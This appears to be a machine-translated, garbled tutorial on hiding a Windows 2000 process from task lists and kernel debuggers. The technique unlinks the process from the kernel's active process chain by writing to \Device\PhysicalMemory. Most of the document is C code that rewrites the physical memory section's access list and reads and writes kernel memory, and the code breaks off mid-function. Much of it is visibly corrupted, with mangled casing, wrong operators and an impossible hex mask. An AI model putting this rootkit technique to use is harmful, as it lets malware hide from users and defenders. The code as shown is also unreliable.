Before explanation, first mention some structures, there are several processes related chains in the process enforcement block, one of which is the active process chain. One of the important roles of this chain is to query the system information for traversing the current activity process. It is interesting that M $ may not use it due to efficiency factors, which does not take advantage of the process of transition, etc., Further, it is not necessary to have a problem that cannot be ignored (this is the foundation of this program). How to do it is obvious, delete the process you want to have in the bidirectional chain of the activity process or the core debugger (such as Softice / Proc) can not be found. The code for hiding the current process under 2000 is as follows: #include
Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;
#define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L
typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; BOOL InitNTDLL () {g_hNtDLL = LoadLibrary ( "ntdll. "); if (! g_hntdll) {RTURN FALSE;} RTLINITUNICODESTRING = (RTLINITUNICODESTRING) GETPROCADDRESS (G_HNTDLL," RTLINITUNICODEST ring "); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL," ZwOpenSection "); return TRUE;} VOID CloseNTDLL () {if (g_hNtDLL = NULL) {FreeLibrary (g_hNtDLL);!}} VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (! dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp; } ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS)); EA.GRFACCESSPERMISSIONS = section_map_write;
ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (dwRes = SetEntriesInAcl (1, & ea, pDacl, ! & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp:! if (pSD) LocalFree (pSD) ; if (pNewDacl) LocalFree (pNewDacl);} HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes .Rootdirectory = null; attributes.objectname = & physmemstring; attributes.attributes = 0; attributes.securityDescriptor = null; attributes.sec urityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = (! NT_SUCCESS (status)); | ZwOpenSection (& g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4, 0, 0x30000, 0x1000); if (g_pMapPhysicalMemory ==
NULL) {return NULL;} return g_hMPM;} PVOID LinearToPhys (PULONG BaseAddress, PVOID addr) {ULONG VAddr = (ULONG) addr, PGDE, PTE, PAddr; PGDE = BaseAddress [VAddr >> 22]; if ((PGDE & 1) ! = 0) {ULONG tmp = PGDE & 0x00000080; if (tmp = 0) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);!} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000) ; PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12]; if ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFF); UnmapViewOffile (PVOID) PGDE);} else Return 0 ;}} else return 0; return (PVOID) PAddr;} ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(Phys & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} bool setData (pvoid addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp = = 0) RETURN FALSE; TMP [(Phys & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;} Bool HideProcessatall () {if (initntdll ()) {i (OpenPhysicalMemory () == 0) {RETURN FALSE;} ulong thread = getdata (pvoid) 0xffdff124); ulong process = getData (pvoid (thread 0x22c)); ulong fw = getData (PVOID (Process
